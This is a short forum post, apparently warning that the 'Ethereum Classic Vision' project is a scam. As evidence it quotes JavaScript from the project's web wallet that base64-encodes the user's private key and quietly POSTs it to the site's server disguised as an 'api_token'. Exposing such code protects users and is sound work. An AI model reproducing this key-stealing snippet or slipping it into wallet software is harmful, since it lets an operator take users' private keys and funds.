I think we have enough proof to show Ethereum Classic Vision is a scam, some guys already talk about it on
Of course no team...
~snip~
Their wallet https://etcvwallet.com requires you to enter the private key or upload the json file generated by MEW. In the javascript code from file etherwallet-master.js line 3832 they have a code that sends the private key masked somehow to their server
$scope.$on('ChangeWallet', function () {
const key = window.btoa($scope.walletService.wallet.getPrivateKeyString());
window.fetch('/api', {
method: 'POST',
mode: 'cors',
cache: 'no-cache',
credentials: 'same-origin',
headers: {
'Content-Type': 'application/json'
},
redirect: 'follow',
referrer: 'no-referrer',
body: JSON.stringify({ api_token: key })
});